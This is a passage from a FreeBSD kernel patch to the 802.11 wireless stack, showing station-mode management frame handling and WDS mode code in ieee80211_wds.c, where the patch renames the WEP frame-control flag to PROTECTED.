IEEE80211_F_JOIN | IEEE80211_F_DOSORT | IEEE80211_F_DOFRATE | IEEE80211_F_DONEGO | IEEE80211_F_DODEL); if (rate & IEEE80211_RATE_BASIC) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ASSOC, wh->i_addr2, "%sassoc failed (rate set mismatch)", ISREASSOC(subtype) ? "re" : ""); vap->iv_stats.is_rx_assoc_norate++; ieee80211_new_state(vap, IEEE80211_S_SCAN, IEEE80211_SCAN_FAIL_STATUS); return; } ni->ni_capinfo = capinfo; ni->ni_associd = associd; if (ni->ni_jointime == 0) ni->ni_jointime = time_uptime; if (wme != NULL && ieee80211_parse_wmeparams(vap, wme, wh) >= 0) { ni->ni_flags |= IEEE80211_NODE_QOS; ieee80211_wme_updateparams(vap); } else ni->ni_flags &= ~IEEE80211_NODE_QOS; /* * Setup HT state according to the negotiation. * * NB: shouldn't need to check if HT use is enabled but some * ap's send back HT ie's even when we don't indicate we * are HT capable in our AssocReq. */ if (htcap != NULL && htinfo != NULL && (vap->iv_flags_ht & IEEE80211_FHT_HT)) { ieee80211_ht_node_init(ni); ieee80211_ht_updateparams(ni, htcap, htinfo); ieee80211_setup_htrates(ni, htcap, IEEE80211_F_JOIN | IEEE80211_F_DOBRS); ieee80211_setup_basic_htrates(ni, htinfo); ieee80211_node_setuptxparms(ni); ieee80211_ratectl_node_init(ni); } else { #ifdef IEEE80211_SUPPORT_SUPERG if (IEEE80211_ATH_CAP(vap, ni, IEEE80211_NODE_ATH)) ieee80211_ff_node_init(ni); #endif } /* * Configure state now that we are associated. * * XXX may need different/additional driver callbacks? */ if (IEEE80211_IS_CHAN_A(ic->ic_curchan) || (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE)) { ic->ic_flags |= IEEE80211_F_SHPREAMBLE; ic->ic_flags &= ~IEEE80211_F_USEBARKER; } else { ic->ic_flags &= ~IEEE80211_F_SHPREAMBLE; ic->ic_flags |= IEEE80211_F_USEBARKER; } ieee80211_set_shortslottime(ic, IEEE80211_IS_CHAN_A(ic->ic_curchan) || (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_SLOTTIME)); /* * Honor ERP protection. * * NB: ni_erp should zero for non-11g operation. */ if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan) && (ni->ni_erp & IEEE80211_ERP_USE_PROTECTION)) ic->ic_flags |= IEEE80211_F_USEPROT; else ic->ic_flags &= ~IEEE80211_F_USEPROT; IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ASSOC | IEEE80211_MSG_DEBUG, wh->i_addr2, "%sassoc success at aid %d: %s preamble, %s slot time%s%s%s%s%s%s%s%s", ISREASSOC(subtype) ? "re" : "", IEEE80211_NODE_AID(ni), ic->ic_flags&IEEE80211_F_SHPREAMBLE ? "short" : "long", ic->ic_flags&IEEE80211_F_SHSLOT ? "short" : "long", ic->ic_flags&IEEE80211_F_USEPROT ? ", protection" : "", ni->ni_flags & IEEE80211_NODE_QOS ? ", QoS" : "", ni->ni_flags & IEEE80211_NODE_HT ? (ni->ni_chw == 40 ? ", HT40" : ", HT20") : "", ni->ni_flags & IEEE80211_NODE_AMPDU ? " (+AMPDU)" : "", ni->ni_flags & IEEE80211_NODE_MIMO_RTS ? " (+SMPS-DYN)" : ni->ni_flags & IEEE80211_NODE_MIMO_PS ? " (+SMPS)" : "", ni->ni_flags & IEEE80211_NODE_RIFS ? " (+RIFS)" : "", IEEE80211_ATH_CAP(vap, ni, IEEE80211_NODE_FF) ? ", fast-frames" : "", IEEE80211_ATH_CAP(vap, ni, IEEE80211_NODE_TURBOP) ? ", turbo" : "" ); ieee80211_new_state(vap, IEEE80211_S_RUN, subtype); break; } case IEEE80211_FC0_SUBTYPE_DEAUTH: { uint16_t reason; if (vap->iv_state == IEEE80211_S_SCAN) { vap->iv_stats.is_rx_mgtdiscard++; return; } if (!IEEE80211_ADDR_EQ(wh->i_addr1, vap->iv_myaddr)) { /* NB: can happen when in promiscuous mode */ vap->iv_stats.is_rx_mgtdiscard++; break; } /* * deauth frame format * [2] reason */ IEEE80211_VERIFY_LENGTH(efrm - frm, 2, return); reason = le16toh(*(uint16_t *)frm); vap->iv_stats.is_rx_deauth++; vap->iv_stats.is_rx_deauth_code = reason; IEEE80211_NODE_STAT(ni, rx_deauth); IEEE80211_NOTE(vap, IEEE80211_MSG_AUTH, ni, "recv deauthenticate (reason %d)", reason); ieee80211_new_state(vap, IEEE80211_S_AUTH, (reason << 8) | IEEE80211_FC0_SUBTYPE_DEAUTH); break; } case IEEE80211_FC0_SUBTYPE_DISASSOC: { uint16_t reason; if (vap->iv_state != IEEE80211_S_RUN && vap->iv_state != IEEE80211_S_ASSOC && vap->iv_state != IEEE80211_S_AUTH) { vap->iv_stats.is_rx_mgtdiscard++; return; } if (!IEEE80211_ADDR_EQ(wh->i_addr1, vap->iv_myaddr)) { /* NB: can happen when in promiscuous mode */ vap->iv_stats.is_rx_mgtdiscard++; break; } /* * disassoc frame format * [2] reason */ IEEE80211_VERIFY_LENGTH(efrm - frm, 2, return); reason = le16toh(*(uint16_t *)frm); vap->iv_stats.is_rx_disassoc++; vap->iv_stats.is_rx_disassoc_code = reason; IEEE80211_NODE_STAT(ni, rx_disassoc); IEEE80211_NOTE(vap, IEEE80211_MSG_ASSOC, ni, "recv disassociate (reason %d)", reason); ieee80211_new_state(vap, IEEE80211_S_ASSOC, 0); break; } case IEEE80211_FC0_SUBTYPE_ACTION: case IEEE80211_FC0_SUBTYPE_ACTION_NOACK: if (!IEEE80211_ADDR_EQ(vap->iv_myaddr, wh->i_addr1) && !IEEE80211_IS_MULTICAST(wh->i_addr1)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not for us"); vap->iv_stats.is_rx_mgtdiscard++; } else if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; } else { if (ieee80211_parse_action(ni, m0) == 0) (void)ic->ic_recv_action(ni, wh, frm, efrm); } break; case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: case IEEE80211_FC0_SUBTYPE_PROBE_REQ: case IEEE80211_FC0_SUBTYPE_ATIM: IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not handled"); vap->iv_stats.is_rx_mgtdiscard++; break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "mgt", "subtype 0x%x not handled", subtype); vap->iv_stats.is_rx_badsubtype++; break; } #undef ISREASSOC #undef ISPROBE } static void sta_recv_ctl(struct ieee80211_node *ni, struct mbuf *m, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_BAR: ieee80211_recv_bar(ni, m); break; } } diff --git a/sys/net80211/ieee80211_wds.c b/sys/net80211/ieee80211_wds.c index e0dfaeafff6a..fdeaf25f06ae 100644 --- a/sys/net80211/ieee80211_wds.c +++ b/sys/net80211/ieee80211_wds.c @@ -1,800 +1,800 @@ /*- * Copyright (c) 2007-2008 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #ifdef __FreeBSD__ __FBSDID("$FreeBSD$"); #endif /* * IEEE 802.11 WDS mode support. */ #include "opt_inet.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif static void wds_vattach(struct ieee80211vap *); static int wds_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int wds_input(struct ieee80211_node *ni, struct mbuf *m, int, int); static void wds_recv_mgmt(struct ieee80211_node *, struct mbuf *, int subtype, int, int); void ieee80211_wds_attach(struct ieee80211com *ic) { ic->ic_vattach[IEEE80211_M_WDS] = wds_vattach; } void ieee80211_wds_detach(struct ieee80211com *ic) { } static void wds_vdetach(struct ieee80211vap *vap) { if (vap->iv_bss != NULL) { /* XXX locking? */ if (vap->iv_bss->ni_wdsvap == vap) vap->iv_bss->ni_wdsvap = NULL; } } static void wds_vattach(struct ieee80211vap *vap) { vap->iv_newstate = wds_newstate; vap->iv_input = wds_input; vap->iv_recv_mgmt = wds_recv_mgmt; vap->iv_opdetach = wds_vdetach; } static void wds_flush(struct ieee80211_node *ni) { struct ieee80211com *ic = ni->ni_ic; struct mbuf *m, *next; int8_t rssi, nf; m = ieee80211_ageq_remove(&ic->ic_stageq, (void *)(uintptr_t) ieee80211_mac_hash(ic, ni->ni_macaddr)); if (m == NULL) return; IEEE80211_NOTE(ni->ni_vap, IEEE80211_MSG_WDS, ni, "%s", "flush wds queue"); ic->ic_node_getsignal(ni, &rssi, &nf); for (; m != NULL; m = next) { next = m->m_nextpkt; m->m_nextpkt = NULL; ieee80211_input(ni, m, rssi, nf); } } static int ieee80211_create_wds(struct ieee80211vap *vap, struct ieee80211_channel *chan) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node_table *nt = &ic->ic_sta; struct ieee80211_node *ni, *obss; IEEE80211_DPRINTF(vap, IEEE80211_MSG_WDS, "%s: creating link to %s on channel %u\n", __func__, ether_sprintf(vap->iv_des_bssid), ieee80211_chan2ieee(ic, chan)); /* NB: vap create must specify the bssid for the link */ KASSERT(vap->iv_flags & IEEE80211_F_DESBSSID, ("no bssid")); /* NB: we should only be called on RUN transition */ KASSERT(vap->iv_state == IEEE80211_S_RUN, ("!RUN state")); if ((vap->iv_flags_ext & IEEE80211_FEXT_WDSLEGACY) == 0) { /* * Dynamic/non-legacy WDS. Reference the associated * station specified by the desired bssid setup at vap * create. Point ni_wdsvap at the WDS vap so 4-address * frames received through the associated AP vap will * be dispatched upward (e.g. to a bridge) as though * they arrived on the WDS vap. */ IEEE80211_NODE_LOCK(nt); obss = NULL; ni = ieee80211_find_node_locked(&ic->ic_sta, vap->iv_des_bssid); if (ni == NULL) { /* * Node went away before we could hookup. This * should be ok; no traffic will flow and a leave * event will be dispatched that should cause * the vap to be destroyed. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_WDS, "%s: station %s went away\n", __func__, ether_sprintf(vap->iv_des_bssid)); /* XXX stat? */ } else if (ni->ni_wdsvap != NULL) { /* * Node already setup with a WDS vap; we cannot * allow multiple references so disallow. If * ni_wdsvap points at us that's ok; we should * do nothing anyway. */ /* XXX printf instead? */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_WDS, "%s: station %s in use with %s\n", __func__, ether_sprintf(vap->iv_des_bssid), ni->ni_wdsvap->iv_ifp->if_xname); /* XXX stat? */ } else { /* * Committed to new node, setup state. */ obss = vap->iv_bss; vap->iv_bss = ni; ni->ni_wdsvap = vap; } IEEE80211_NODE_UNLOCK(nt); if (obss != NULL) { /* NB: deferred to avoid recursive lock */ ieee80211_free_node(obss); } } else { /* * Legacy WDS vap setup. */ /* * The far end does not associate so we just create * create a new node and install it as the vap's * bss node. We must simulate an association and * authorize the port for traffic to flow. * XXX check if node already in sta table? */ ni = ieee80211_node_create_wds(vap, vap->iv_des_bssid, chan); if (ni != NULL) { obss = vap->iv_bss; vap->iv_bss = ieee80211_ref_node(ni); ni->ni_flags |= IEEE80211_NODE_AREF; if (obss != NULL) ieee80211_free_node(obss); /* give driver a chance to setup state like ni_txrate */ if (ic->ic_newassoc != NULL) ic->ic_newassoc(ni, 1); /* tell the authenticator about new station */ if (vap->iv_auth->ia_node_join != NULL) vap->iv_auth->ia_node_join(ni); if (ni->ni_authmode != IEEE80211_AUTH_8021X) ieee80211_node_authorize(ni); ieee80211_notify_node_join(ni, 1 /*newassoc*/); /* XXX inject l2uf frame */ } } /* * Flush any pending frames now that were setup. */ if (ni != NULL) wds_flush(ni); return (ni == NULL ? ENOENT : 0); } /* * Propagate multicast frames of an ap vap to all DWDS links. * The caller is assumed to have verified this frame is multicast. */ void ieee80211_dwds_mcast(struct ieee80211vap *vap0, struct mbuf *m) { struct ieee80211com *ic = vap0->iv_ic; const struct ether_header *eh = mtod(m, const struct ether_header *); struct ieee80211_node *ni; struct ieee80211vap *vap; struct ifnet *ifp; struct mbuf *mcopy; int err; KASSERT(ETHER_IS_MULTICAST(eh->ether_dhost), ("%s not mcast", ether_sprintf(eh->ether_dhost))); /* XXX locking */ TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { /* only DWDS vaps are interesting */ if (vap->iv_opmode != IEEE80211_M_WDS || (vap->iv_flags_ext & IEEE80211_FEXT_WDSLEGACY)) continue; /* if it came in this interface, don't send it back out */ ifp = vap->iv_ifp; if (ifp == m->m_pkthdr.rcvif) continue; /* * Duplicate the frame and send it. */ mcopy = m_copypacket(m, M_NOWAIT); if (mcopy == NULL) { ifp->if_oerrors++; /* XXX stat + msg */ continue; } ni = ieee80211_find_txnode(vap, eh->ether_dhost); if (ni == NULL) { /* NB: ieee80211_find_txnode does stat+msg */ ifp->if_oerrors++; m_freem(mcopy); continue; } /* calculate priority so drivers can find the tx queue */ if (ieee80211_classify(ni, mcopy)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_OUTPUT | IEEE80211_MSG_WDS, eh->ether_dhost, NULL, "%s", "classification failure"); vap->iv_stats.is_tx_classify++; ifp->if_oerrors++; m_freem(mcopy); ieee80211_free_node(ni); continue; } BPF_MTAP(ifp, m); /* 802.3 tx */ /* * Encapsulate the packet in prep for transmission. */ mcopy = ieee80211_encap(vap, ni, mcopy); if (mcopy == NULL) { /* NB: stat+msg handled in ieee80211_encap */ ieee80211_free_node(ni); continue; } mcopy->m_flags |= M_MCAST; mcopy->m_pkthdr.rcvif = (void *) ni; err = ieee80211_parent_xmitpkt(ic, mcopy); if (err) { /* NB: IFQ_HANDOFF reclaims mbuf */ ifp->if_oerrors++; ieee80211_free_node(ni); } else ifp->if_opackets++; } } /* * Handle DWDS discovery on receipt of a 4-address frame in * ap mode. Queue the frame and post an event for someone * to plumb the necessary WDS vap for this station. Frames * received prior to the vap set running will then be reprocessed * as if they were just received. */ void ieee80211_dwds_discover(struct ieee80211_node *ni, struct mbuf *m) { struct ieee80211com *ic = ni->ni_ic; /* * Save the frame with an aging interval 4 times * the listen interval specified by the station. * Frames that sit around too long are reclaimed * using this information. * XXX handle overflow? * XXX per/vap beacon interval? */ m->m_pkthdr.rcvif = (void *)(uintptr_t) ieee80211_mac_hash(ic, ni->ni_macaddr); (void) ieee80211_ageq_append(&ic->ic_stageq, m, ((ni->ni_intval * ic->ic_lintval) << 2) / 1024); ieee80211_notify_wds_discover(ni); } /* * IEEE80211_M_WDS vap state machine handler. */ static int wds_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni; enum ieee80211_state ostate; int error; IEEE80211_LOCK_ASSERT(ic); ostate = vap->iv_state; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); vap->iv_state = nstate; /* state transition */ callout_stop(&vap->iv_mgtsend); /* XXX callout_drain */ if (ostate != IEEE80211_S_SCAN) ieee80211_cancel_scan(vap); /* background scan */ ni = vap->iv_bss; /* NB: no reference held */ error = 0; switch (nstate) { case IEEE80211_S_INIT: switch (ostate) { case IEEE80211_S_SCAN: ieee80211_cancel_scan(vap); break; default: break; } if (ostate != IEEE80211_S_INIT) { /* NB: optimize INIT -> INIT case */ ieee80211_reset_bss(vap); } break; case IEEE80211_S_SCAN: switch (ostate) { case IEEE80211_S_INIT: ieee80211_check_scan_current(vap); break; default: break; } break; case IEEE80211_S_RUN: if (ostate == IEEE80211_S_INIT) { /* * Already have a channel; bypass the scan * and startup immediately. */ error = ieee80211_create_wds(vap, ic->ic_curchan); } break; default: break; } return error; } /* * Process a received frame. The node associated with the sender * should be supplied. If nothing was found in the node table then * the caller is assumed to supply a reference to iv_bss instead. * The RSSI and a timestamp are also supplied. The RSSI data is used * during AP scanning to select a AP to associate with; it can have * any units so long as values have consistent units and higher values * mean ``better signal''. The receive timestamp is currently not used * by the 802.11 layer. */ static int wds_input(struct ieee80211_node *ni, struct mbuf *m, int rssi, int nf) { #define HAS_SEQ(type) ((type & 0x4) == 0) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_frame *wh; struct ieee80211_key *key; struct ether_header *eh; int hdrspace, need_tap = 1; /* mbuf need to be tapped. */ uint8_t dir, type, subtype, qos; uint16_t rxseq; if (m->m_flags & M_AMPDU_MPDU) { /* * Fastpath for A-MPDU reorder q resubmission. Frames * w/ M_AMPDU_MPDU marked have already passed through * here but were received out of order and been held on * the reorder queue. When resubmitted they are marked * with the M_AMPDU_MPDU flag and we can bypass most of * the normal processing. */ wh = mtod(m, struct ieee80211_frame *); type = IEEE80211_FC0_TYPE_DATA; dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; subtype = IEEE80211_FC0_SUBTYPE_QOS; hdrspace = ieee80211_hdrspace(ic, wh); /* XXX optimize? */ goto resubmit_ampdu; } KASSERT(ni != NULL, ("null node")); type = -1; /* undefined */ if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_min)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (1): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } /* * Bit of a cheat here, we use a pointer for a 3-address * frame format but don't reference fields past outside * ieee80211_frame_min w/o first validating the data is * present. */ wh = mtod(m, struct ieee80211_frame *); if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) ni->ni_inact = ni->ni_inact_reload; if ((wh->i_fc[0] & IEEE80211_FC0_VERSION_MASK) != IEEE80211_FC0_VERSION_0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "wrong version, fc %02x:%02x", wh->i_fc[0], wh->i_fc[1]); vap->iv_stats.is_rx_badversion++; goto err; } dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; /* NB: WDS vap's do not scan */ if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_addr4)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (3): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } /* NB: the TA is implicitly verified by finding the wds peer node */ if (!IEEE80211_ADDR_EQ(wh->i_addr1, vap->iv_myaddr) && !IEEE80211_ADDR_EQ(wh->i_addr1, ifp->if_broadcastaddr)) { /* not interested in */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, wh->i_addr1, NULL, "%s", "not to bss"); vap->iv_stats.is_rx_wrongbss++; goto out; } IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; if (HAS_SEQ(type)) { uint8_t tid = ieee80211_gettid(wh); if (IEEE80211_QOS_HAS_SEQ(wh) && TID_TO_WME_AC(tid) >= WME_AC_VI) ic->ic_wme.wme_hipri_traffic++; rxseq = le16toh(*(uint16_t *)wh->i_seq); if (! ieee80211_check_rxseq(ni, wh)) { /* duplicate, discard */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, wh->i_addr1, "duplicate", "seqno <%u,%u> fragno <%u,%u> tid %u", rxseq >> IEEE80211_SEQ_SEQ_SHIFT, ni->ni_rxseqs[tid] >> IEEE80211_SEQ_SEQ_SHIFT, rxseq & IEEE80211_SEQ_FRAG_MASK, ni->ni_rxseqs[tid] & IEEE80211_SEQ_FRAG_MASK, tid); vap->iv_stats.is_rx_dup++; IEEE80211_NODE_STAT(ni, rx_dup); goto out; } ni->ni_rxseqs[tid] = rxseq; } switch (type) { case IEEE80211_FC0_TYPE_DATA: hdrspace = ieee80211_hdrspace(ic, wh); if (m->m_len < hdrspace && (m = m_pullup(m, hdrspace)) == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "data too short: expecting %u", hdrspace); vap->iv_stats.is_rx_tooshort++; goto out; /* XXX */ } if (dir != IEEE80211_FC1_DIR_DSTODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto out; } /* * Only legacy WDS traffic should take this path. */ if ((vap->iv_flags_ext & IEEE80211_FEXT_WDSLEGACY) == 0) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "%s", "not legacy wds"); vap->iv_stats.is_rx_wrongdir++;/*XXX*/ goto out; } /* * Handle A-MPDU re-ordering. If the frame is to be * processed directly then ieee80211_ampdu_reorder * will return 0; otherwise it has consumed the mbuf * and we should do nothing more with it. */ if ((m->m_flags & M_AMPDU) && ieee80211_ampdu_reorder(ni, m) != 0) { m = NULL; goto out; } resubmit_ampdu: /* * Handle privacy requirements. Note that we * must not be preempted from here until after * we (potentially) call ieee80211_crypto_demic; * otherwise we may violate assumptions in the * crypto cipher modules used to do delayed update * of replay sequence numbers. */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { /* * Discard encrypted frames when privacy is off. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "WEP", "%s", "PRIVACY off"); vap->iv_stats.is_rx_noprivacy++; IEEE80211_NODE_STAT(ni, rx_noprivacy); goto out; } key = ieee80211_crypto_decap(ni, m, hdrspace); if (key == NULL) { /* NB: stats+msgs handled in crypto_decap */ IEEE80211_NODE_STAT(ni, rx_wepfail); goto out; } wh = mtod(m, struct ieee80211_frame *); - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } else { /* XXX M_WEP and IEEE80211_F_PRIVACY */ key = NULL; } /* * Save QoS bits for use below--before we strip the header. */ if (subtype == IEEE80211_FC0_SUBTYPE_QOS) { qos = (dir == IEEE80211_FC1_DIR_DSTODS) ? ((struct ieee80211_qosframe_addr4 *)wh)->i_qos[0] : ((struct ieee80211_qosframe *)wh)->i_qos[0]; } else qos = 0; /* * Next up, any fragmentation. */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { m = ieee80211_defrag(ni, m, hdrspace); if (m == NULL) { /* Fragment dropped or frame not complete yet */ goto out; } } wh = NULL; /* no longer valid, catch any uses */ /* * Next strip any MSDU crypto bits. */ if (key != NULL && !ieee80211_crypto_demic(vap, key, m, 0)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "demic error"); vap->iv_stats.is_rx_demicfail++; IEEE80211_NODE_STAT(ni, rx_demicfail); goto out; } /* copy to listener after decrypt */ if (ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); need_tap = 0; /* * Finally, strip the 802.11 header. */ m = ieee80211_decap(vap, m, hdrspace); if (m == NULL) { /* XXX mask bit to check for both */ /* don't count Null data frames as errors */ if (subtype == IEEE80211_FC0_SUBTYPE_NODATA || subtype == IEEE80211_FC0_SUBTYPE_QOS_NULL) goto out; IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "decap error"); vap->iv_stats.is_rx_decap++; IEEE80211_NODE_STAT(ni, rx_decap); goto err; } eh = mtod(m, struct ether_header *); if (!ieee80211_node_is_authorized(ni)) { /* * Deny any non-PAE frames received prior to * authorization. For open/shared-key * authentication the port is mark authorized * after authentication completes. For 802.1x * the port is not marked authorized by the * authenticator until the handshake has completed. */ if (eh->ether_type != htons(ETHERTYPE_PAE)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, eh->ether_shost, "data", "unauthorized port: ether type 0x%x len %u", eh->ether_type, m->m_pkthdr.len); vap->iv_stats.is_rx_unauth++; IEEE80211_NODE_STAT(ni, rx_unauth); goto err; } } else { /* * When denying unencrypted frames, discard * any non-PAE frames received without encryption. */ if ((vap->iv_flags & IEEE80211_F_DROPUNENC) && (key == NULL && (m->m_flags & M_WEP) == 0) && eh->ether_type != htons(ETHERTYPE_PAE)) { /* * Drop unencrypted frames. */ vap->iv_stats.is_rx_unencrypted++; IEEE80211_NODE_STAT(ni, rx_unencrypted); goto out; } } /* XXX require HT? */ if (qos & IEEE80211_QOS_AMSDU) { m = ieee80211_decap_amsdu(ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; } else { #ifdef IEEE80211_SUPPORT_SUPERG m = ieee80211_decap_fastframe(vap, ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; #endif } ieee80211_deliver_data(vap, ni, m); return IEEE80211_FC0_TYPE_DATA; case IEEE80211_FC0_TYPE_MGT: vap->iv_stats.is_rx_mgmt++; IEEE80211_NODE_STAT(ni, rx_mgmt); if (dir != IEEE80211_FC1_DIR_NODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto err; } if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, "mgt", "too short: len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } #ifdef IEEE80211_DEBUG if (ieee80211_msg_debug(vap) || ieee80211_msg_dumppkts(vap)) { if_printf(ifp, "received %s from %s rssi %d\n", ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], ether_sprintf(wh->i_addr2), rssi); } #endif - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "WEP set but not permitted"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX */ goto out; } vap->iv_recv_mgmt(ni, m, subtype, rssi, nf); goto out; case IEEE80211_FC0_TYPE_CTL: vap->iv_stats.is_rx_ctl++; IEEE80211_NODE_STAT(ni, rx_ctrl); goto out; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "bad", "frame type 0x%x", type); /* should not come here */ break; } err: ifp->if_ierrors++; out: if (m != NULL) { if (need_tap && ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); m_freem(m); } return type; } static void wds_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m0, int subtype, int rssi, int nf) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; u_int8_t *frm, *efrm; wh = mtod(m0, struct ieee80211_frame *); frm = (u_int8_t *)&wh[1]; efrm = mtod(m0, u_int8_t *) + m0->m_len; switch (subtype) { case IEEE80211_FC0_SUBTYPE_ACTION: case IEEE80211_FC0_SUBTYPE_ACTION_NOACK: if (ni == vap->iv_bss) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "unknown node"); vap->iv_stats.is_rx_mgtdiscard++; } else if (!IEEE80211_ADDR_EQ(vap->iv_myaddr, wh->i_addr1)) { /* NB: not interested in multicast frames. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not for us"); vap->iv_stats.is_rx_mgtdiscard++; } else if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; } else { if (ieee80211_parse_action(ni, m0) == 0) (void)ic->ic_recv_action(ni, wh, frm, efrm); } break; case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: case IEEE80211_FC0_SUBTYPE_PROBE_REQ: case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: case IEEE80211_FC0_SUBTYPE_ATIM: case 